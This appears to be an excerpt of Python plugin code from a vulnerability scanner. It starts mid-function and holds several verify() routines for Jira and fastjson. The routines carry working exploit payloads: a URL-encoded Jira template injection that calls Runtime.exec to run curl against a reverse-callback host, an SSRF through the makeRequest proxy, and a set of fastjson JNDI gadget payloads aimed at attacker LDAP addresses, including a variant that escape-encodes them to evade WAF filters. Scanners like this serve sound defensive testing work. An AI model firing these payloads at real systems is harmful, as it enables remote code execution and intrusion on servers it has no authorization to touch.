                        "request": parser_.getrequestraw(),
                        "response": parser_.getresponseraw()
                    }
                })
                break
def verify(self):
    """Jira ContactAdministrators check: scrape the atlassian-token from the
    form page, post the url-encoded template payload (runs `curl <reverse
    url>`), and confirm via the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf")
    reverse_url = reverse_url[0].split(" ")[1]  # url part of the first reverse command
    req = {
        "method": "GET",
        "url": self.url + "secure/ContactAdministrators!default.jspa",
        "allow_redirects": False,
        "verify": False,
        "timeout": 10
    }
    r = request(**req)
    if r != None and r.status_code == 200:
        res = re.search('name="atlassian-token" content="(?P<token>.+?)"',
                        r.text)
        if res:
            token = res.groupdict().get('token')
            req["url"] = self.url + "secure/ContactAdministrators.jspa"
            req["method"] = "POST"
            # URL-encoded template-injection payload in the mail subject.
            req["data"] = "from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%curl+{reverseUrl}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={token}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81".format(
                reverseUrl=quote(reverse_url), token=token)
            r1 = request(**req)
            # 302 indicates the mail form was accepted/processed.
            if r1 != None and r1.status_code == 302:
                query_res, query_data = query_reverse(reverse_data)
                if query_res:
                    parser_ = response_parser(r)
                    self.result.append({
                        "name": self.name,
                        "url": self.url,
                        "level": self.level,  # 0:Low 1:Medium 2:High
                        "detail": {
                            "vulmsg": self.vulmsg,
                            "request": parser_.getrequestraw(),
                            "response": parser_.getresponseraw()
                        }
                    })
def verify(self):
    """Jira makeRequest SSRF check: requests the gadgets/makeRequest proxy
    with a url@reverse-host trick and confirms via the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    url = "{protocol}://{host}:{port}".format(**self.dictdata.get("url"))
    reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf")
    reverse_url = reverse_url[0].split(" ")[1]  # url part of the first reverse command
    req = {
        "method": "GET",
        "headers": {
            "X-Atlassian-Token": "no-check",
        },
        "url": self.url + "plugins/servlet/gadgets/makeRequest?url={}@{}".format(
            url, reverse_url),
        "allow_redirects": True,
        "verify": False,
        "timeout": 10
    }
    r = request(**req)
    # The makeRequest proxy prefixes its responses with "don't be evil".
    if r is not None and b"don't be evil" in r.content:  # idiom fix: was `r != None`
        res, res_data = query_reverse(reverse_data)
        if res:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
def verify(self):
    """Fire reverse commands (http variant plus a dns-host variant) via
    self.run and report when any callback appears in the reverse log."""
    # Strict depth limit: reverse-connection checks only at the site root.
    if self.url.count("/") != 3:
        return
    reverse_urls, reverse_data = generate_reverse_payloads(self.name)
    _, dns_data = generate(self.name, "dns")
    tasks = []
    for reverse_url in reverse_urls:
        # Each command in two flavors: raw http reverse url, and the same
        # command with the reverse ip swapped for the dns token.
        for cmd in [
                reverse_url,
                reverse_url.replace(reverse_set.get("reverse_http_ip", ""),
                                    dns_data)
        ]:
            tasks.append(cmd)
    mythread(self.run, tasks)
    sleep = True  # only the first reverse-log lookup waits
    for hexdata in [reverse_data, dns_data]:
        query_res, _ = query_reverse(hexdata, sleep)
        sleep = False
        if query_res:
            parser_ = dictdata_parser(self.dictdata)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
            break
def verify(self):
    """Fastjson JNDI gadget sweep: sends a battery of version-tagged @type
    payloads (ldap callbacks) into JSON-valued params and/or the raw JSON
    body, then polls the reverse log via self.saveflags (filled by
    send_payload)."""
    # NOTE(review): self.parse is used but never assigned in this method —
    # presumably set by the plugin base class before verify() runs; confirm.
    if self.dictdata.get("url").get("extension") in notAcceptedExt:
        return
    if not self.can_output(self.parse.getrootpath() + self.name):  # report only once
        return
    needtests = []
    # None marks "raw JSON body" as an injection point.
    if self.dictdata.get("request").get("content_type") == 4:
        needtests.append(None)
    # Parameters whose current value already is JSON are injection points too.
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    for param in params:
        arg = param.get("value", "")
        if isjson(arg):
            needtests.append(param)
    # One payload per known-vulnerable fastjson version / gadget chain.
    payloads = [
        {
            "vul": "ver=1.2.47",
            "payload":
            '''{ "rasdnd1": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "randfd2": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "ver=1.2.43",
            "payload":
            '''{"raasdnd1":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"%(ldap)s","autoCommit":true]}}''',
            "type": "ldap"
        },
        {
            "vul": "ver=1.2.42",
            "payload":
            '''{ "rasdfnd1": { "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "1.2.25<=ver<=1.2.41",
            "payload":
            '''{ "ranfasdfd1": { "@type": "Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "<=1.2.24",
            "payload":
            '''{ "radassnd1": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "ibatis-core:3.0",
            "payload":
            '''{ "raasdnd1": { "@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": { "data_source": "%(ldap)s" } } }''',
            "type": "ldap"
        },
        {
            "vul": "spring-context:4.3.7.RELEASE",
            "payload":
            '''{ "ransdasd1": { "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", "targetBeanName": "%(ldap)s", "propertyPath": "foo", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] } } }''',
            "type": "ldap"
        },
        {
            "vul": "unknown",
            "payload":
            '''{ "raasd2nd1": Set[ { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] }, "adviceBeanName": "%(ldap)s" }, { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor" } ]}''',
            "type": "ldap"
        },
        {
            "vul": "unknown",
            "payload":
            '''{ "rand1": { "@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource", "jndiName": "%(ldap)s", "loginTimeout": 0 } }''',
            "type": "ldap"
        }
    ]
    # Every (payload, injection point) pair is sent concurrently.
    datas = []
    for payload in payloads:
        for arg in needtests:
            datas.append((payload, arg))
    mythread(self.send_payload, datas, cmd_line_options.threads)
    # query reverse log — only the first lookup waits
    sleep = True
    for hexdata, msg in self.saveflags.items():
        payload, vul = msg
        res, resdata = query_reverse(hexdata, sleep)
        sleep = False
        if res:
            self.result.append({
                "name": self.name,
                "url": self.parse.getrootpath(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "payload": payload,
                    "version": vul,
                    "others": "dnslog res:{}".format(resdata),
                    "request": self.parse.getrequestraw(),
                    "response": self.parse.getresponseraw()
                }
            })
            # Mark this root path as reported.
            self.can_output(self.parse.getrootpath() + self.name, True)
def verify(self):
    """Fastjson deserialization check against a JSON request body.

    Sends one request per known gadget payload, each pointing at a unique
    reverse LDAP/RMI address, then polls the reverse-connection log and
    records a finding for every observed callback.
    """
    # Only applicable when the request body itself is JSON (content_type == 4).
    if not self.dictdata.get("request").get("content_type") == 4:
        return
    # Report at most once per root path.
    if not self.can_output(self.parse.getrootpath() + self.name):
        return
    payloads = [{
        "vul": "ver=1.2.47",
        "payload": '''{ "rasdnd1": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "randfd2": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
        "type": "ldap"
    }, {
        "vul": "ver=1.2.43",
        "payload": '''{"raasdnd1":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"%(ldap)s","autoCommit":true]}}''',
        "type": "ldap"
    }, {
        "vul": "ver=1.2.42",
        "payload": '''{ "rasdfnd1": { "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
        "type": "ldap"
    }, {
        "vul": "1.2.25<=ver<=1.2.41",
        "payload": '''{ "ranfasdfd1": { "@type": "Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
        "type": "ldap"
    }, {
        "vul": "<=1.2.24",
        "payload": '''{ "radassnd1": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
        "type": "ldap"
    }, {
        "vul": "ibatis-core:3.0",
        "payload": '''{ "raasdnd1": { "@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": { "data_source": "%(ldap)s" } } }''',
        "type": "ldap"
    }, {
        "vul": "spring-context:4.3.7.RELEASE",
        "payload": '''{ "ransdasd1": { "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", "targetBeanName": "%(ldap)s", "propertyPath": "foo", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] } } }''',
        "type": "ldap"
    }, {
        "vul": "unknown",
        "payload": '''{ "raasd2nd1": Set[ { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] }, "adviceBeanName": "%(ldap)s" }, { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor" } ]}''',
        "type": "ldap"
    }, {
        "vul": "unknown",
        "payload": '''{ "rand1": { "@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource", "jndiName": "%(ldap)s", "loginTimeout": 0 } }''',
        "type": "ldap"
    }]
    # Maps reverse-log token -> (request body sent, version tag).
    flags = {}
    for entry in payloads:
        marker = get_random_str(5).lower() + entry.get("vul", "")
        body = ""
        kind = entry.get("type")
        # "ldap" and "rmi" payloads differ only in the reverse service used
        # and the template key substituted into the payload string.
        if kind in ("ldap", "rmi"):
            addr, hexflag = generate(self.parse.getrootpath() + marker, kind)
            body = entry.get("payload") % {kind: addr}
            flags[hexflag] = (body, entry.get("vul", ""))
        req = self.parse.generaterequest({"data": body})
        request(**req)
    # Poll the reverse log; only the very first lookup waits.
    found = False
    for idx, (hexflag, record) in enumerate(flags.items()):
        used_payload, version_tag = record
        res, resdata = query_reverse(hexflag, idx == 0)
        if res:
            self.result.append({
                "name": self.name,
                "url": self.parse.getrootpath(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "payload": used_payload,
                    "version": version_tag,
                    "others": "dnslog res:{}".format(resdata),
                    "request": self.parse.getrequestraw(),
                    "response": self.parse.getresponseraw()
                }
            })
            found = True
    if found:
        mark = self.parse.getrootpath() + self.name
        if not self.can_output(mark):  # another process already reported it; just set the flag
            self.can_output(mark, True)
def verify(self):
    """Fastjson deserialization check with randomly escape-encoded payloads.

    Like the plain JSON-body check, but re-encodes every key/value character
    as \\xNN or \\uNNNN to evade naive WAF keyword filters before sending.
    Findings are confirmed via the reverse-connection (dnslog) service.
    """
    # Only applicable when the request body itself is JSON (content_type == 4).
    if not self.dictdata.get("request").get("content_type") == 4:
        return
    # Report at most once per root path.
    if not self.can_output(self.parse.getrootpath() + self.name):
        return

    def transform_json(json_dict):
        """Recursively escape-encode every string key/value in a JSON dict."""

        def random_encode(s):
            """Encode each char of s randomly as an ASCII (\\xNN) or unicode (\\uNNNN) escape."""
            encoded_str = ''
            for c in s:
                if randint(0, 100) < 51:
                    encoded_str += '\\x{:>02x}'.format(ord(c))
                else:
                    encoded_str += '\\u{:>04x}'.format(ord(c))
            return encoded_str

        def transform_iterable(iterable):
            """Recursively encode all fields of an iterable."""
            # TODO: preserve the original container type instead of forcing list.
            result_list = []
            for it in iterable:
                if isinstance(it, str):
                    result = random_encode(it)
                elif isinstance(it, dict):
                    result = transform_json(it)
                elif isinstance(it, Iterable):
                    result = transform_iterable(it)
                else:
                    result = it
                result_list.append(result)
            # BUG FIX: previously `return 0`, which discarded the encoded
            # list and corrupted any payload containing arrays.
            return result_list

        # BUG FIX: iterate over a snapshot of the keys. Popping/inserting
        # while iterating the live keys view raises RuntimeError in Python 3.
        for key in list(json_dict.keys()):
            encoded_key = random_encode(key)
            value = json_dict[key]
            if isinstance(value, str):
                encoded_value = random_encode(value)
            elif isinstance(value, dict):
                encoded_value = transform_json(value)
            elif isinstance(value, Iterable):
                encoded_value = transform_iterable(value)
            else:
                encoded_value = value
            json_dict.pop(key)
            json_dict.update({encoded_key: encoded_value})
        return json_dict

    # Gadget payloads per vulnerable fastjson version / classpath library.
    # "code": False marks payloads that are not valid JSON and therefore
    # cannot go through the loads/transform/dumps encoding round-trip.
    payloads = [
        {
            "vul": "ver=1.2.47",
            "payload": '''{ "rasdnd1": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "randfd2": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "ver=1.2.43",
            "payload": '''{"raasdnd1":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"%(ldap)s","autoCommit":true]}}''',
            "type": "ldap",
            "code": False
        },
        {
            "vul": "ver=1.2.42",
            "payload": '''{ "rasdfnd1": { "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "1.2.25<=ver<=1.2.41",
            "payload": '''{ "ranfasdfd1": { "@type": "Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "<=1.2.24",
            "payload": '''{ "radassnd1": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''',
            "type": "ldap"
        },
        {
            "vul": "ibatis-core:3.0",
            "payload": '''{ "raasdnd1": { "@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": { "data_source": "%(ldap)s" } } }''',
            "type": "ldap"
        },
        {
            "vul": "spring-context:4.3.7.RELEASE",
            "payload": '''{ "ransdasd1": { "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", "targetBeanName": "%(ldap)s", "propertyPath": "foo", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] } } }''',
            "type": "ldap"
        },
        {
            "vul": "unknown",
            "payload": '''{ "raasd2nd1": Set[ { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] }, "adviceBeanName": "%(ldap)s" }, { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor" } ]}''',
            "type": "ldap"
        },
        {
            "vul": "unknown",
            "payload": '''{ "rand1": { "@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource", "jndiName": "%(ldap)s", "loginTimeout": 0 } }''',
            "type": "ldap"
        }
    ]
    # Maps reverse-log token -> (request body sent, version tag).
    saveflags = {}
    for payload in payloads:
        random_str = get_random_str(5).lower() + payload.get("vul", "")
        data_with_payload = ""
        if payload.get("type") == "ldap":
            ldapaddr, ldaphexdata = generate(self.parse.getrootpath() + random_str, "ldap")
            if payload.get("code", True):
                try:
                    # loads raises ValueError (JSONDecodeError) on broken JSON;
                    # % raises KeyError on a template/key mismatch.
                    json_payload = loads(payload.get("payload") % {"ldap": ldapaddr})
                except (KeyError, ValueError):
                    print("get error")
                    print(payload.get("payload"))
                    continue
                # dumps escapes our backslashes; collapse \\x -> \x so the
                # target's fastjson parser sees the escape sequences.
                data_with_payload = dumps(transform_json(json_payload)).replace('\\\\', '\\')
            else:
                data_with_payload = payload.get("payload") % {"ldap": ldapaddr}
            saveflags[ldaphexdata] = (data_with_payload, payload.get("vul", ""))
        elif payload.get("type") == "rmi":
            rmiaddr, rmihexdata = generate(self.parse.getrootpath() + random_str, "rmi")
            if payload.get("code", True):
                try:
                    json_payload = loads(payload.get("payload") % {"rmi": rmiaddr})
                except (KeyError, ValueError):
                    print("get error")
                    print(payload.get("payload"))
                    continue
                data_with_payload = dumps(transform_json(json_payload)).replace('\\\\', '\\')
            else:
                # BUG FIX: the format key must be "rmi" to match %(rmi)s
                # templates; the old {"ldap": rmiaddr} raised KeyError.
                data_with_payload = payload.get("payload") % {"rmi": rmiaddr}
            saveflags[rmihexdata] = (data_with_payload, payload.get("vul", ""))
        req = self.parse.generaterequest({"data": data_with_payload})
        r = request(**req)
    # Poll the reverse log; only the very first lookup waits.
    i = 0
    success = False
    for hexdata, msg in saveflags.items():
        payload, vul = msg
        sleep = True if i == 0 else False
        res, resdata = query_reverse(hexdata, sleep)
        if res:
            self.result.append({
                "name": self.name,
                "url": self.parse.getrootpath(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "payload": payload,
                    "version": vul,
                    "others": "dnslog res:{}".format(resdata),
                    "request": self.parse.getrequestraw(),
                    "response": self.parse.getresponseraw()
                }
            })
            success = True
        i += 1
    if success:
        if not self.can_output(self.parse.getrootpath() + self.name):  # another process already reported it; just set the flag
            self.can_output(self.parse.getrootpath() + self.name, True)